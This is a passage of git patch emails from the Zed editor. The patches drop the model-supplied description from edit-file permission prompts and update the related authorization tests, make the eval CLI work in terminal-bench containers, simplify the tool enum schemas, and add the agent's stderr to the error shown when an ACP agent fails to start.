cx.update(|cx| { tool.authorize( &PathBuf::from("link_to_external/config.txt"), - "edit through symlink", &stream_tx, cx, ) @@ -2854,7 +2744,6 @@ mod tests { let authorize_task = cx.update(|cx| { tool.authorize( &PathBuf::from("link_to_external/config.txt"), - "edit through symlink", &stream_tx, cx, ) @@ -2911,7 +2800,6 @@ mod tests { .update(|cx| { tool.authorize( &PathBuf::from("link_to_external/config.txt"), - "edit through symlink", &stream_tx, cx, ) @@ -2956,8 +2844,7 @@ mod tests { for (path, should_confirm, description) in test_cases { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = - cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); + let auth = cx.update(|cx| tool.authorize(&PathBuf::from(path), &stream_tx, cx)); if should_confirm { stream_rx.expect_authorization().await; @@ -3033,8 +2920,7 @@ mod tests { for (path, should_confirm, description) in test_cases { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = - cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); + let auth = cx.update(|cx| tool.authorize(&PathBuf::from(path), &stream_tx, cx)); if should_confirm { stream_rx.expect_authorization().await; @@ -3092,8 +2978,7 @@ mod tests { for (path, should_confirm, description) in test_cases { let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = - cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); + let auth = cx.update(|cx| tool.authorize(&PathBuf::from(path), &stream_tx, cx)); cx.run_until_parked(); @@ -3134,41 +3019,23 @@ mod tests { // Test .zed path with different modes let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from("project/.zed/settings.json"), - "Edit settings", - &stream_tx, - cx, - ) + tool.authorize(&PathBuf::from("project/.zed/settings.json"), &stream_tx, cx) }); stream_rx.expect_authorization().await; // Test outside path with different modes let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from("/outside/file.txt"), - "Edit file", - &stream_tx, - cx, - ) - }); + let _auth = + cx.update(|cx| tool.authorize(&PathBuf::from("/outside/file.txt"), &stream_tx, cx)); stream_rx.expect_authorization().await; // Test normal path with different modes let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize( - &PathBuf::from("project/normal.txt"), - "Edit file", - &stream_tx, - cx, - ) - }) - .await - .unwrap(); + cx.update(|cx| tool.authorize(&PathBuf::from("project/normal.txt"), &stream_tx, cx)) + .await + .unwrap(); assert!(stream_rx.try_recv().is_err()); } } @@ -3186,27 +3053,6 @@ mod tests { tool.initial_title( Err(json!({ "path": "src/main.rs", - "display_description": "", - })), - cx - ), - "src/main.rs" - ); - assert_eq!( - tool.initial_title( - Err(json!({ - "path": "", - "display_description": "Fix error handling", - })), - cx - ), - "Fix error handling" - ); - assert_eq!( - tool.initial_title( - Err(json!({ - "path": "src/main.rs", - "display_description": "Fix error handling", })), cx ), @@ -3216,7 +3062,6 @@ mod tests { tool.initial_title( Err(json!({ "path": "", - "display_description": "", })), cx ), @@ -3244,7 +3089,6 @@ mod tests { let edit = cx.update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit file".into(), path: path!("/main.rs").into(), mode: EditFileMode::Write, content: Some("new content".into()), @@ -3274,7 +3118,6 @@ mod tests { let edit = cx.update(|cx| { tool.run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit file".into(), path: path!("/main.rs").into(), mode: EditFileMode::Write, content: Some("dropped content".into()), @@ -3323,7 +3166,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "First edit".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, content: None, @@ -3348,7 +3190,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Second edit".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, content: None, @@ -3426,7 +3267,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit after external change".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, content: None, @@ -3511,7 +3351,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit after external change".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, content: None, @@ -3596,7 +3435,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit with dirty buffer".into(), path: "root/test.txt".into(), mode: EditFileMode::Edit, content: None, @@ -3652,7 +3490,6 @@ mod tests { // Setup: resolve the buffer sender.send_partial(json!({ - "display_description": "Overlapping edits", "path": "root/file.txt", "mode": "edit" })); @@ -3664,7 +3501,6 @@ mod tests { // in the modified buffer and replaces it with "ZZZ". // Edit 3 exists only to mark edit 2 as "complete" during streaming. sender.send_partial(json!({ - "display_description": "Overlapping edits", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -3677,7 +3513,6 @@ mod tests { // Send the final input with all three edits. sender.send_full(json!({ - "display_description": "Overlapping edits", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -3703,7 +3538,6 @@ mod tests { // Transition to BufferResolved sender.send_partial(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write" })); @@ -3711,7 +3545,6 @@ mod tests { // Stream content incrementally sender.send_partial(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write", "content": "line 1\n" @@ -3729,7 +3562,6 @@ mod tests { // Stream more content sender.send_partial(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write", "content": "line 1\nline 2\n" @@ -3739,7 +3571,6 @@ mod tests { // Stream final chunk sender.send_partial(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write", "content": "line 1\nline 2\nline 3\n" @@ -3752,7 +3583,6 @@ mod tests { // Send final input sender.send_full(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write", "content": "line 1\nline 2\nline 3\n" @@ -3778,13 +3608,11 @@ mod tests { // Transition to BufferResolved sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write" })); @@ -3802,7 +3630,6 @@ mod tests { // Stream first content chunk sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write", "content": "new line 1\n" @@ -3816,7 +3643,6 @@ mod tests { // Send final input sender.send_full(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write", "content": "new line 1\nnew line 2\n" @@ -3849,7 +3675,6 @@ mod tests { // Transition to BufferResolved sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write" })); @@ -3868,7 +3693,6 @@ mod tests { // First content partial replaces old content sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write", "content": "new line 1\n" @@ -3878,7 +3702,6 @@ mod tests { // Subsequent content partials append sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write", "content": "new line 1\nnew line 2\n" @@ -3891,7 +3714,6 @@ mod tests { // Send final input with complete content sender.send_full(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write", "content": "new line 1\nnew line 2\nnew line 3\n" @@ -3917,7 +3739,6 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_partial(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "edit" })); @@ -3929,7 +3750,6 @@ mod tests { // partial 1: old_text = "hello\\" (fixer closes incomplete \n as \\) // partial 2: old_text = "hello\nworld" (fixer corrected the escape) sender.send_partial(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "hello\\"}] @@ -3938,7 +3758,6 @@ mod tests { // Now the fixer corrects it to the real newline. sender.send_partial(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "hello\nworld"}] @@ -3947,7 +3766,6 @@ mod tests { // Send final. sender.send_full(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "hello\nworld", "new_text": "HELLO\nWORLD"}] @@ -3969,14 +3787,12 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_partial(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "edit" })); cx.run_until_parked(); sender.send_full(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "edit", "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" @@ -4005,7 +3821,6 @@ mod tests { let task = cx.update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit lines".to_string(), path: "root/file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -4049,7 +3864,6 @@ mod tests { let task = cx.update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Overwrite file".to_string(), path: "root/file.txt".into(), mode: EditFileMode::Write, content: Some("completely new content".into()), @@ -4084,20 +3898,17 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "write" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "write", "content": "new_content" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "write", "content": "new_content", "path": "root" @@ -4106,7 +3917,6 @@ mod tests { // Send final. sender.send_full(json!({ - "display_description": "Overwrite file", "mode": "write", "content": "new_content", "path": "root/file.txt" @@ -4130,27 +3940,23 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "edit" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "edit", "edits": [{"old_text": "old_content"}] })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "edit", "edits": [{"old_text": "old_content", "new_text": "new_content"}] })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Overwrite file", "mode": "edit", "edits": [{"old_text": "old_content", "new_text": "new_content"}], "path": "root" @@ -4159,7 +3965,6 @@ mod tests { // Send final. sender.send_full(json!({ - "display_description": "Overwrite file", "mode": "edit", "edits": [{"old_text": "old_content", "new_text": "new_content"}], "path": "root/file.txt" @@ -4200,7 +4005,6 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_full(json!({ - "display_description": "Remove extra blank lines", "path": "root/file.rs", "mode": "edit", "edits": [{"old_text": old_text, "new_text": new_text}] @@ -4241,7 +4045,6 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); sender.send_full(json!({ - "display_description": "description", "path": "root/file.rs", "mode": "edit", "edits": [{"old_text": old_text, "new_text": new_text}] @@ -4278,7 +4081,6 @@ mod tests { let task = cx.update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Create new file".into(), path: "root/dir/new_file.txt".into(), mode: EditFileMode::Write, content: Some("Hello, World!".into()), @@ -4318,7 +4120,6 @@ mod tests { #[test] fn test_input_deserializes_double_encoded_fields() { let input = serde_json::from_value::(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "\"edit\"", "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" @@ -4332,7 +4133,6 @@ mod tests { assert_eq!(edits[0].new_text, "HELLO\nWORLD"); let input = serde_json::from_value::(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "\"edit\"" })) @@ -4340,7 +4140,6 @@ mod tests { assert!(input.edits.is_none()); let input = serde_json::from_value::(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "\"edit\"", "edits": null @@ -4349,7 +4148,6 @@ mod tests { assert!(input.edits.is_none()); let input = serde_json::from_value::(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": "\"edit\"", "edits": "[{\"old_text\": \"hello\\nworld\", \"new_text\": \"HELLO\\nWORLD\"}]" @@ -4363,7 +4161,6 @@ mod tests { assert_eq!(edits[0].new_text.as_deref(), Some("HELLO\nWORLD")); let input = serde_json::from_value::(json!({ - "display_description": "Edit", "path": "root/file.txt" })) .expect("input should deserialize"); @@ -4371,7 +4168,6 @@ mod tests { assert!(input.edits.is_none()); let input = serde_json::from_value::(json!({ - "display_description": "Edit", "path": "root/file.txt", "mode": null, "edits": null diff --git a/crates/agent/src/tools/tool_permissions.rs b/crates/agent/src/tools/tool_permissions.rs index 4304877cd078f5..aa541c3e0ef579 100644 --- a/crates/agent/src/tools/tool_permissions.rs +++ b/crates/agent/src/tools/tool_permissions.rs @@ -381,7 +381,6 @@ pub fn collect_symlink_escapes<'a>( pub fn authorize_file_edit( tool_name: &str, path: &Path, - display_description: &str, thread: &WeakEntity, event_stream: &ToolCallEventStream, cx: &mut App, @@ -396,7 +395,7 @@ pub fn authorize_file_edit( } let path_owned = path.to_path_buf(); - let display_description = display_description.to_string(); + let title = format!("Edit {}", util::markdown::MarkdownInlineCode(&path_str)); let tool_name = tool_name.to_string(); let thread = thread.clone(); let event_stream = event_stream.clone(); @@ -486,7 +485,7 @@ pub fn authorize_file_edit( vec![path_owned.to_string_lossy().to_string()], ); event_stream.authorize_always_prompt( - format!("{} (local settings)", display_description), + format!("{title} (local settings)"), context, cx, ) @@ -499,11 +498,7 @@ pub fn authorize_file_edit( &tool_name, vec![path_owned.to_string_lossy().to_string()], ); - event_stream.authorize_always_prompt( - format!("{} (settings)", display_description), - context, - cx, - ) + event_stream.authorize_always_prompt(format!("{title} (settings)"), context, cx) }); return authorize.await; } @@ -518,7 +513,7 @@ pub fn authorize_file_edit( &tool_name, vec![path_owned.to_string_lossy().to_string()], ); - event_stream.authorize(&display_description, context, cx) + event_stream.authorize(&title, context, cx) }); authorize.await } From 2dcf7b1bf5a6a2df5320ca73482d1a68b7f08e9e Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Tue, 5 May 2026 14:32:58 +0200 Subject: [PATCH 189/231] eval_cli: Fixes for termbench (#55762) Release Notes: - N/A --- crates/eval_cli/src/main.rs | 2 +- crates/eval_cli/zed_eval/agent.py | 49 +++++++++++++++++++++++-------- 2 files changed, 37 insertions(+), 14 deletions(-) diff --git a/crates/eval_cli/src/main.rs b/crates/eval_cli/src/main.rs index bb6cbc883e1b6d..e77e75bc87980e 100644 --- a/crates/eval_cli/src/main.rs +++ b/crates/eval_cli/src/main.rs @@ -70,7 +70,7 @@ struct Args { workdir: PathBuf, /// Instruction/prompt text. If omitted, read from --instruction-file or stdin. - #[arg(long)] + #[arg(long, allow_hyphen_values = true)] instruction: Option, /// Language model to use, in `provider/model` format. diff --git a/crates/eval_cli/zed_eval/agent.py b/crates/eval_cli/zed_eval/agent.py index 54403e9a2531fd..4543dd9497d6b7 100644 --- a/crates/eval_cli/zed_eval/agent.py +++ b/crates/eval_cli/zed_eval/agent.py @@ -52,19 +52,20 @@ def name() -> str: return "zed" async def _detect_workdir(self, environment: BaseEnvironment) -> str: - """Detect the repo working directory inside the container. + """Detect the working directory inside the container. Checks, in order: 1. Explicit ``EVAL_CLI_WORKDIR`` extra-env override - 2. ``/app`` (SWE-bench Pro) - 3. ``/testbed`` (SWE-bench Verified) - 4. ``/repo`` - 5. First git repo found under ``/`` (max depth 3) + 2. Well-known dirs with a ``.git`` subdirectory (SWE-bench style) + 3. First git repo found under ``/`` (max depth 3) + 4. Well-known dirs that exist at all (terminal-bench style) + 5. The container's default working directory (``pwd``) """ override = self._extra_env.get("EVAL_CLI_WORKDIR") if override: return override + # First: try to find a git repo (SWE-bench, etc.) result = await self.exec_as_agent( environment, command=( @@ -75,13 +76,29 @@ async def _detect_workdir(self, environment: BaseEnvironment) -> str: '| head -1 | sed "s|/.git$||"' ), ) - workdir = result.stdout.strip() - if not workdir: - raise RuntimeError( - "Could not find a git repository in the container. " - "Set EVAL_CLI_WORKDIR explicitly via --ae EVAL_CLI_WORKDIR=/path/to/repo" - ) - return workdir + workdir = (result.stdout or "").strip() + if workdir: + return workdir + + # Fallback: use the first well-known directory that exists, + # even without .git (terminal-bench containers aren't git repos). + result = await self.exec_as_agent( + environment, + command=( + "for d in /app /testbed /repo /root /home; do " + ' if [ -d "$d" ]; then echo "$d"; exit 0; fi; ' + "done; " + "pwd" + ), + ) + workdir = (result.stdout or "").strip() + if workdir: + return workdir + + raise RuntimeError( + "Could not detect a working directory in the container. " + "Set EVAL_CLI_WORKDIR explicitly via --ae EVAL_CLI_WORKDIR=/path/to/repo" + ) async def install(self, environment: BaseEnvironment) -> None: # Detect the package manager and install base dependencies. @@ -426,12 +443,18 @@ async def run( env=env, ) + # Only generate a patch if the workdir is a git repo + # (SWE-bench style). Terminal-bench containers aren't git repos. await self.exec_as_agent( environment, command=( + 'if [ -d ".git" ]; then ' "git add -A && " "git diff --cached HEAD > /logs/agent/patch.diff && " - 'echo "Patch size: $(wc -c < /logs/agent/patch.diff) bytes"' + 'echo "Patch size: $(wc -c < /logs/agent/patch.diff) bytes"; ' + "else " + 'echo "No git repo found, skipping patch generation"; ' + "fi" ), cwd=workdir, ) From cc081c92b9d8ae86b6e1e55be807d8a4b7b2dc47 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Tue, 5 May 2026 14:39:41 +0200 Subject: [PATCH 190/231] agent: Simplify tool schemas for enums (#55763) Previously schemars generated oneOf variants for these enums (because we added inline comments), making the schemas more complicated than they had to be. E.g. `edit_file` `mode` Before: ```json { "mode": { "description": "The mode of operation on the file. Possible values:\n- 'write': Replace the entire contents of the file. If the file doesn't exist, it will be created. Requires 'content' field.\n- 'edit': Make granular edits to an existing file. Requires 'edits' field.\n\nWhen a file already exists or you just created it, prefer editing it as opposed to recreating it from scratch.", "oneOf": [ { "description": "Overwrite the file with new content (replacing any existing content).\nIf the file does not exist, it will be created.", "type": "string", "const": "write" }, { "description": "Make granular edits to an existing file", "type": "string", "const": "edit" } ] } } ``` After: ```json { "mode": { "description": "The mode of operation on the file. Possible values:\n- 'write': Replace the entire contents of the file. If the file doesn't exist, it will be created. Requires 'content' field.\n- 'edit': Make granular edits to an existing file. Requires 'edits' field.\n\nWhen a file already exists or you just created it, prefer editing it as opposed to recreating it from scratch.", "type": "string", "enum": ["write", "edit"] } } ``` Release Notes: - N/A --- crates/agent/src/tools/edit_file_tool.rs | 3 --- crates/agent/src/tools/now_tool.rs | 4 +--- 2 files changed, 1 insertion(+), 6 deletions(-) diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index 0e6493953c95ce..234b4ac92f29d3 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -94,10 +94,7 @@ pub struct EditFileToolInput { #[derive(Clone, Copy, Debug, Serialize, Deserialize, JsonSchema)] #[serde(rename_all = "snake_case")] pub enum EditFileMode { - /// Overwrite the file with new content (replacing any existing content). - /// If the file does not exist, it will be created. Write, - /// Make granular edits to an existing file Edit, } diff --git a/crates/agent/src/tools/now_tool.rs b/crates/agent/src/tools/now_tool.rs index f8f4e0d91b5f0e..4032731097c8c0 100644 --- a/crates/agent/src/tools/now_tool.rs +++ b/crates/agent/src/tools/now_tool.rs @@ -12,10 +12,8 @@ use crate::{AgentTool, ToolCallEventStream, ToolInput}; #[serde(rename_all = "snake_case")] #[schemars(inline)] pub enum Timezone { - /// Use UTC for the datetime. #[serde(alias = "UTC", alias = "Utc")] Utc, - /// Use local time for the datetime. #[serde(alias = "LOCAL", alias = "Local")] Local, } @@ -24,7 +22,7 @@ pub enum Timezone { /// Only use this tool when the user specifically asks for it or the current task would benefit from knowing the current datetime. #[derive(Debug, Serialize, Deserialize, JsonSchema)] pub struct NowToolInput { - /// The timezone to use for the datetime. + /// The timezone to use for the datetime. Use `utc` for UTC, or `local` for the system's local time. timezone: Timezone, } From 5c9f503877168215996c8cd33d06919c0e65c052 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Tue, 5 May 2026 14:39:50 +0200 Subject: [PATCH 191/231] agent_servers: Include stderr in ACP startup exit errors (#55757) Previously, we weren't waiting on the status future early enough so we would just hang if we weren't able to start the agent process. I also added the recent stderr logs in there to help the user debug the issue, since it is likely relevant in these cases. image Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - acp: Improve error messages if the ACP agent fails to start. --- crates/acp_thread/src/acp_thread.rs | 3 +- crates/agent_servers/src/acp.rs | 209 +++++++++++++++++++---- crates/agent_ui/src/conversation_view.rs | 16 +- 3 files changed, 188 insertions(+), 40 deletions(-) diff --git a/crates/acp_thread/src/acp_thread.rs b/crates/acp_thread/src/acp_thread.rs index 42c6af38362fb1..a18f9f21e79b54 100644 --- a/crates/acp_thread/src/acp_thread.rs +++ b/crates/acp_thread/src/acp_thread.rs @@ -1177,6 +1177,7 @@ pub enum LoadError { FailedToInstall(SharedString), Exited { status: ExitStatus, + stderr: Option, }, Other(SharedString), } @@ -1195,7 +1196,7 @@ impl Display for LoadError { ) } LoadError::FailedToInstall(msg) => write!(f, "Failed to install: {msg}"), - LoadError::Exited { status } => write!(f, "Server exited with status {status}"), + LoadError::Exited { status, .. } => write!(f, "Server exited with status {status}"), LoadError::Other(msg) => write!(f, "{msg}"), } } diff --git a/crates/agent_servers/src/acp.rs b/crates/agent_servers/src/acp.rs index 832b6afe04873a..93efddb03d81db 100644 --- a/crates/agent_servers/src/acp.rs +++ b/crates/agent_servers/src/acp.rs @@ -20,7 +20,7 @@ use project::{AgentId, Project}; use remote::remote_client::Interactive; use serde::Deserialize; use std::path::PathBuf; -use std::process::Stdio; +use std::process::{ExitStatus, Stdio}; use std::rc::Rc; use std::sync::{Arc, Mutex}; use std::{any::Any, cell::RefCell, collections::VecDeque}; @@ -195,6 +195,34 @@ impl AcpDebugLog { sender.try_send(message.clone()).log_err(); } } + + fn trailing_stderr(&self) -> Option { + let state = self.state.lock().ok()?; + let mut lines = state + .messages + .iter() + .rev() + .take_while(|message| matches!(&message.message, AcpDebugMessageContent::Stderr { .. })) + .filter_map(|message| match &message.message { + AcpDebugMessageContent::Stderr { line } if !line.is_empty() => Some(line.as_ref()), + _ => None, + }) + .collect::>(); + + if lines.is_empty() { + return None; + } + + lines.reverse(); + Some(lines.join("\n")) + } +} + +fn exited_load_error_with_stderr(status: ExitStatus, debug_log: &AcpDebugLog) -> LoadError { + LoadError::Exited { + status, + stderr: debug_log.trailing_stderr().map(SharedString::from), + } } /// Awaits the response to an ACP request from a GPUI foreground task. @@ -714,6 +742,7 @@ impl AcpConnection { log::trace!("Spawned (pid: {})", child.id()); let sessions = Rc::new(RefCell::new(HashMap::default())); + let debug_log = AcpDebugLog::default(); let (release_channel, version): (Option<&str>, String) = cx.update(|cx| { ( @@ -729,7 +758,6 @@ impl AcpConnection { // Set up the foreground dispatch channel for bridging Send handler // closures to the !Send foreground thread. let (dispatch_tx, dispatch_rx) = mpsc::unbounded::(); - let debug_log = AcpDebugLog::default(); let incoming_lines = futures::io::BufReader::new(stdout).lines(); let tapped_incoming = incoming_lines.inspect({ @@ -756,6 +784,23 @@ impl AcpConnection { let transport = Lines::new(tapped_outgoing, tapped_incoming); + let stderr_task = cx.background_spawn({ + let debug_log = debug_log.clone(); + async move { + let mut stderr = BufReader::new(stderr); + let mut line = String::new(); + while let Ok(n) = stderr.read_line(&mut line).await + && n > 0 + { + let trimmed = line.trim_end_matches(['\n', '\r']); + log::warn!("agent stderr: {trimmed}"); + debug_log.record_line(AcpDebugMessageDirection::Stderr, trimmed); + line.clear(); + } + Ok(()) + } + }); + // `connect_client_future` installs the production handler set and // hands us back both the connection-future (to run on a background // executor) and a oneshot receiver that produces the @@ -769,9 +814,24 @@ impl AcpConnection { } }); - let connection: ConnectionTo = connection_rx + let connection_rx = async move { + connection_rx + .await + .context("Failed to receive ACP connection handle") + } + .boxed_local(); + let status_fut = child.status().boxed_local(); + let (connection, status_fut) = match futures::future::select(connection_rx, status_fut) .await - .context("Failed to receive ACP connection handle")?; + { + futures::future::Either::Left((connection, status_fut)) => (connection?, status_fut), + futures::future::Either::Right((status, _connection_rx)) => match status { + Ok(status) => return Err(exited_load_error_with_stderr(status, &debug_log).into()), + Err(err) => { + return Err(anyhow!("agent server exited before initialization: {err}")); + } + }, + }; // Set up the foreground dispatch loop to process work items from handlers. let dispatch_context = ClientContext { @@ -787,34 +847,7 @@ impl AcpConnection { } }); - let stderr_task = cx.background_spawn({ - let debug_log = debug_log.clone(); - async move { - let mut stderr = BufReader::new(stderr); - let mut line = String::new(); - while let Ok(n) = stderr.read_line(&mut line).await - && n > 0 - { - let trimmed = line.trim_end_matches(['\n', '\r']); - log::warn!("agent stderr: {trimmed}"); - debug_log.record_line(AcpDebugMessageDirection::Stderr, trimmed); - line.clear(); - } - Ok(()) - } - }); - - let wait_task = cx.spawn({ - let sessions = sessions.clone(); - let status_fut = child.status(); - async move |cx| { - let status = status_fut.await?; - emit_load_error_to_all_sessions(&sessions, LoadError::Exited { status }, cx); - anyhow::Ok(()) - } - }); - - let response = into_foreground_future( + let initialize_response = into_foreground_future( connection.send_request( acp::InitializeRequest::new(acp::ProtocolVersion::V1) .client_capabilities( @@ -835,12 +868,38 @@ impl AcpConnection { ), ), ) - .await?; + .map(|response| response.map_err(anyhow::Error::from)) + .boxed_local(); + let (response, status_fut) = match futures::future::select(initialize_response, status_fut) + .await + { + futures::future::Either::Left((response, status_fut)) => (response?, status_fut), + futures::future::Either::Right((status, _initialize_response)) => match status { + Ok(status) => return Err(exited_load_error_with_stderr(status, &debug_log).into()), + Err(err) => { + return Err(anyhow!("agent server exited before initialization: {err}")); + } + }, + }; if response.protocol_version < MINIMUM_SUPPORTED_VERSION { return Err(UnsupportedVersion.into()); } + let wait_task = cx.spawn({ + let sessions = sessions.clone(); + let debug_log = debug_log.clone(); + async move |cx| { + let status = status_fut.await?; + emit_load_error_to_all_sessions( + &sessions, + exited_load_error_with_stderr(status, &debug_log), + cx, + ); + anyhow::Ok(()) + } + }); + let telemetry_id = response .agent_info // Use the one the agent provides if we have one @@ -1881,7 +1940,10 @@ pub mod test_support { while let Ok(status) = exit_rx.recv().await { emit_load_error_to_all_sessions( &connection.sessions, - LoadError::Exited { status }, + LoadError::Exited { + status, + stderr: None, + }, cx, ); } @@ -2373,6 +2435,85 @@ mod tests { assert_eq!(task.label, "Login"); } + #[test] + fn trailing_stderr_only_uses_final_stderr_block() { + let debug_log = AcpDebugLog::default(); + debug_log.record_line(AcpDebugMessageDirection::Stderr, "stale stderr"); + debug_log.record_line( + AcpDebugMessageDirection::Incoming, + r#"{"method":"initialized"}"#, + ); + + assert_eq!(debug_log.trailing_stderr(), None); + + debug_log.record_line(AcpDebugMessageDirection::Stderr, "recent stderr"); + assert_eq!( + debug_log.trailing_stderr().as_deref(), + Some("recent stderr") + ); + } + + #[cfg(not(windows))] + #[gpui::test] + async fn startup_returns_error_when_agent_exits_before_initialization( + cx: &mut gpui::TestAppContext, + ) { + cx.update(|cx| { + let store = settings::SettingsStore::test(cx); + cx.set_global(store); + }); + cx.executor().allow_parking(); + + let temp_dir = tempfile::tempdir().unwrap(); + let project = project::Project::example([temp_dir.path()], &mut cx.to_async()).await; + let agent_server_store = + project.read_with(cx, |project, _| project.agent_server_store().downgrade()); + let command = AgentServerCommand { + path: "/bin/sh".into(), + args: vec![ + "-c".into(), + r#"printf '%s\n' 'npm error code ETARGET' 'npm error notarget No matching version found for @agentclientprotocol/claude-agent-acp@0.32.0 with a date before 4/28/2026, 12:11:38 PM.' >&2; exit 1"#.into(), + ], + env: None, + }; + + let mut async_cx = cx.to_async(); + let startup = AcpConnection::stdio( + AgentId::new("test-agent"), + project, + command, + agent_server_store, + None, + None, + HashMap::default(), + &mut async_cx, + ) + .fuse(); + let timeout = cx + .background_executor + .timer(std::time::Duration::from_secs(5)) + .fuse(); + futures::pin_mut!(startup, timeout); + + let result = futures::select! { + result = startup => result, + _ = timeout => panic!("timed out waiting for failed ACP startup"), + }; + + let Err(error) = result else { + panic!("expected ACP startup to fail"); + }; + let load_error = error + .downcast::() + .expect("startup failure should preserve the typed load error"); + match load_error { + LoadError::Exited { status, .. } => { + assert!(!status.success(), "expected non-zero exit status"); + } + error => panic!("expected exited load error, got: {error:?}"), + }; + } + async fn connect_fake_agent( cx: &mut gpui::TestAppContext, ) -> ( diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index c1a975939f6275..6ddac5f3f9fb73 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -2159,11 +2159,17 @@ impl ConversationView { msg.into(), Some(self.create_copy_button(msg.to_string()).into_any_element()), ), - LoadError::Exited { status } => ( - "Failed to Launch", - format!("Server exited with status {status}").into(), - None, - ), + LoadError::Exited { status, stderr } => { + let mut message = format!("Server exited with status {status}"); + if let Some(stderr) = stderr { + message.push_str("\n"); + message.push_str(stderr); + }; + let action_slot = stderr + .is_some() + .then(|| self.create_copy_button(message.clone()).into_any_element()); + ("Failed to Launch", message.into(), action_slot) + } LoadError::Other(msg) => ( "Failed to Launch", msg.into(), From 